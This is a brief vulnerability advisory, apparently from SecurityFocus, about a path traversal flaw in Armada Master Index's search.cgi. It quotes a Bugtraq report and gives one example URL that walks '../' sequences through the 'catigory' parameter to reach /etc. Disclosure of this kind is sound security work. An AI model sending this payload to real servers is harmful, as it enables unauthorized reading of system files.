Armada Master Index Path Traversal Vulnerability

From the message to Bugtraq which detailed this issue (the message is included in it's entirety in the 'Credit' section of this vulnerability entry):

Example:

http://www.target.com/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../.. ../../etc


 

Privacy Statement
Copyright 2010, SecurityFocus